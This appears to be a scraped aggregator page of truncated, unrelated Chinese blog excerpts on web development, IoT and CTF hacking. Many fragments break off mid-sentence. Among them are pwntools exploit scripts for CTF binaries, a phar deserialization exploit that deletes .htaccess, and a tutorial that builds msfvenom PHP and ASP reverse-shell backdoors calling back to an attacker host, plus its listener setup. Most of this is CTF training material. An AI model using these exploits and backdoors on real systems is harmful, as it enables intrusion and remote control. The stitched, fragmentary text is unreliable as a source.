payload

Bugku CTF web题wp一句话

眉间皱痕 提交于 2020-02-26 09:13:12
0x00 web2 直接F12拿到flag KEY{Web-2-bugKssNNikls9100} 0x01 计算器 F12修改maxlength=2得到flag flag{CTF-bugku-0032} 0x02 web基础$_GET 提交GET参数?what=flag得到flag flag{bugku_get_su8kej2en} 0x03 web基础$_POST 提交POST参数what=flag得到flag flag{bugku_get_ssseint67se} 0x04 矛盾 num不能是纯数字且等于1,构造payload:num=1/1得到flag flag{bugku-789-ps-ssdf} 0x05 web3 禁用js之后F12查看源码,里面有一串Unicode,解码得到flag KEY{J2sa42ahJK-HS11III} 0x06 域名解析 本地路径C:\Windows\System32\drivers\etc,解析一下再访问flag.baidu.com得到flag KEY{DSAHDSJ82HDS2211} 0x07 你必须让他停下 抓包send to Repeater 一直go直到flag出现 flag{dummy_game_1s_s0_popular} 0x08 变量1 var_dump($$args) 将

JWT什么鬼?django中使用JWT

风格不统一 提交于 2020-02-25 00:55:10
JWT认证校验首选 1.pyJWT简述 因http协议本身为无状态,这样每次用户发出请求,我们并不能区分是哪个用户发出的请求,这样我们可以通过保存cookie以便于识别是哪个用户发来的请求,传统凡事基于session认证。但是这种认证本身很多缺陷,扩展性差,CSRF等问题。JWT(Json web token) 相比传统token,设计更为紧凑且安全。通过JWT可以实现用户认证等操作。 pyJWT下载 pip install pyJWT JWT构成: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsInR5cGUiOiJqd3QifQ.eyJ1c2VybmFtZSI6InhqayIsImV4cCI6MTU4MjU0MjAxN30.oHdfcsUftJJob66e5mL1jLRpJwiG0i9MOD5gzM476eY jwt是由三段信息构成,将3部分信息构成JWT字符串,通过点进行分割,第一部分称为头部(header),第二部分称为在和(payload类似于飞机上承载的物品),第三部分是签证(signature)。 header jwt的头部承载两部分:声明类型,声明加密算法 headers = { "type":"jwt", "alg":"HS256" } 然后将头部进行base64加密。(该加密是可以对称解密的),构成了第一部分

vuex基础 (三) 01-mutations——修改数据-可看成事件,在src-main.js中的store声明的vuex实例中进行定义

对着背影说爱祢 提交于 2020-02-25 00:34:44
03-vuex基础-mutations——修改数据,在src-main.js中的store声明的vuex实例中进行定义 修改数据 更改 Vuex 的 store 中的状态的唯一方法是提交 mutation。 Vuex 中的 mutation 非常 类似于事件 :每个 mutation 都有一个字符串的 事件类型 (type) 和 一个 回调函数 (handler)。这个回调函数就是我们实际进行状态更改的地方,并且它会接受 state 作为第一个参数: 网址: https://vuex.vuejs.org/zh/guide/mutations.html 申明: 第一步:在src/main.js中:申明修改数据 //初始化vuex 里面是配置项 const store = new Vuex.Store({ //申明数据 state:{ //申明数据,相当于vue实例中的data count:1 } //修改数据 + mutations: { // 改变数据 // 1. 没有参数 自增 count 数据 + // increment (state) { + // state.count++ + // } // 2. 使用参数 payload-形参,载荷( 运输数据 ) 可以传参数的写法 + increment (state, payload) { + // payload ====>

NB-IoT 学习开发和应用 第四讲

假装没事ソ 提交于 2020-02-25 00:15:05
NB-IoT 学习开发和应用 第四讲 阿里云物联网平台中的CoAP协议学习和分析 CoAP协议:CoAP协议的底层协议是 UDP (比喻:打电话,单方通信,无需保持链接) 应用范围: NB-IoT、超低功耗应用、野外数据采集监控系统、远程抄表等 特点 :只能数据上报(注:在CoAP协议的定义中,非底层的UDP协议),服务器无法对数据进行下发控制指令。 CoAP协议报文(一共只有4个) 分别是: 1、CON报文(连接请求报文),给服务器发报文,并且发送完以后,服务器必须要发送ACK报文给设备端(即响应报文) 2、NON报文(发送给服务器,服务器无需回复) 3、ACK报文 (响应报文) 4、RST报文(代表数据发送错误,提醒用户重新发送正确的数据给服务区) 注:且在阿里云物联网平台中的的CoAP协议中,只支持 CON 报文的数据类型。其他数据格式或者协议,服务器均不支持。 同时,在阿里云物联网服务器中,上传的数据有两种形式(CON的两种形式) 1、设备认证报文 2、数据上传报文 CoAP协议报文的格式组成形式: Ver+T+TKL+Code+Messige ID+Token+Options+0xff(分隔字符)+Payload 拆分分析: Ver : 版本号 2bit T : 报文类型 2bit (CON : 00 NON : 01 ACK : 10 RST : 11 ) TKL :

BUUCTF jarvisoj exp整合

二次信任 提交于 2020-02-24 12:52:18
0x01 jarvisoj_level0  简单的地址改写 from pwn import * p = remote ( 'node3.buuoj.cn' , 26882 ) #p = process('./level0') shell_addr = 0x0000000000400596 p . sendline ( 'a' * 0x88 + p64 ( shell_addr ) ) p . interactive ( )   0x02 jarvisoj_level2  简单rop,在可执行文件中找到rop from pwn import * p = remote ( 'node3.buuoj.cn' , 26369 ) bin_sh = 0x0804A024 system_addr = 0x08048320 p . sendline ( 'a' * 0x8C + p32 ( system_addr ) + p32 ( 0 ) + p32 ( bin_sh ) ) p . interactive ( )   0x03 jarvisoj_level2_x64  64位的 from pwn import * context . log_level = 'debug' p = remote ( 'node3.buuoj.cn' , 27014 ) #p = process('.

Bytectf-几道web总结

人走茶凉 提交于 2020-02-23 10:56:17
1.EZcms 这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化 首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess 这里主要记录一点,利用php内置类进行文件操作, exp为: <?php class File{ public $filename; public $filepath; public $checker; function __construct() { $this->checker = new Profile(); } } class Profile{ public $username; public $password; public $admin; function __construct() { $this->admin = new ZipArchive; $this->username = '/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess'; $this->password = ZIPARCHIVE::OVERWRITE; } } @unlink("test.phar"); $phar = new Phar("test.phar"); $phar-

Metasploit发布了版本5.0.76

我的未来我决定 提交于 2020-02-23 04:02:55
Metasploit发布了版本5.0.76 在该版本中,增加了以下模块: (1)增强了set payload命令的输入。用户在指定payload时,在payload名称前可以使用/payload、payload/和/前缀。 (2)post/windows/manage/sshkey_persistence和post/ linux/manage/sshkey_persistence模块:利用SSH Key实施渗透。 (3)post/multi/recon/local_exploit_suggester模块:提升Diamorphine Rootkit信号权限。 (4)module exploit/ linux/smtp/apache_james_exec模块:利用Apache James 2.3.2漏洞创建文件。 更新了以下模块: (1)post/windows/gather/enum_patches 模块:收集所有Windows补丁。 (2)更新了generate命令:避免分段显示攻击载荷信息。 (3)post/ linux/gather/enum_system模块:通过从/sys/devices/system/ cpu/ vulnerabilities目录收集的信息,来检查CPU漏洞。 (4)更新了msfconsole和msfvenom的Zsh completions。 来源:

msf建立php反弹shell

眉间皱痕 提交于 2020-02-19 13:45:25
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下asp反弹木马: root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp 二 监听端口建立会话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows) PAYLOAD =>php/meterpreter/reverse_tcp 3 设置监听主机 msfexploit(multi/handler) > set LHOST 192.168.88.155 LHOST =>192.168.88.155 4 设置监听端口(默认4444) msfexploit(multi/handler) > set LPORT 4444

cmcc_simplerop

爷,独闯天下 提交于 2020-02-19 10:50:44
  这是一道系统调用+rop的题。   先来就检查一下保护。   32位程序,只开启了堆栈不可执行。ida看一下伪代码。   代码也很简洁,就是直接让你溢出。这里ida反汇编显示的v4具体ebp的距离是0x14,再加上0x8也就是0x1c就到返回地址了,但是在实际上,偏移不是这么多。这里我们用pwndbg测试。首先cyclic生成一些数字。      用pwndbg调试。   这里测出偏移是32,也就是距离返回地址是0x20。   接下来就是看看有些什么我们可以利用的函数吧!😊   首先就是可以看见有int 0x80,我们可以系统调用,关于系统调用的指令,我们可以参考这个博客,总结的很全。 https://blog.csdn.net/xiaominthere/article/details/17287965   接下来就是我们需要找一些通用的可以给寄存器赋值的命令。       在这里们我选择这两条,因为系统调用,需要我们执行这样的命令。   int80(11,"/bin/sh",null,null)   后面的四个参数分别是eax、ebx、ecx、edx。   所以上面的两条命令刚刚好。   接下来就是想办法找binsh的字符串,这道题是找不到的,需要我们自己输入。输入就需要调用函数,一般我们是选择调用read函数,将binsh字符串写入bss段,直接调用

python requests

泪湿孤枕 提交于 2020-02-18 00:45:20
快速上手 http://docs.python-requests.org/zh_CN/latest/user/quickstart.html Requests 是使用 Apache2 Licensed 许可证的 基于Python开发的HTTP 库,其在Python内置模块的基础上进行了高度的封装,从而使得Pythoner进行网络请求时,变得美好了许多,使用Requests可以轻而易举的 完成浏览器可有的任何操作。 http://httpbin.org/ httpbin这个网站能测试 HTTP 请求和响应的各种信息,比如 cookie、ip、headers 和登录验证等,且支持 GET、POST 等多种方法,对 web 开发和测试很有帮助。 安装:pip install requests 1、Get请求 # 1、无参数实例 import requests ret = requests.get('https://www.baidu.com', timeout=10) print ret.url print ret.text # 2、有参数实例 import requests payload = {'key1': 'value1', 'key2': 'value2'} ret = requests.get("https://www.baidu.com", params=payload)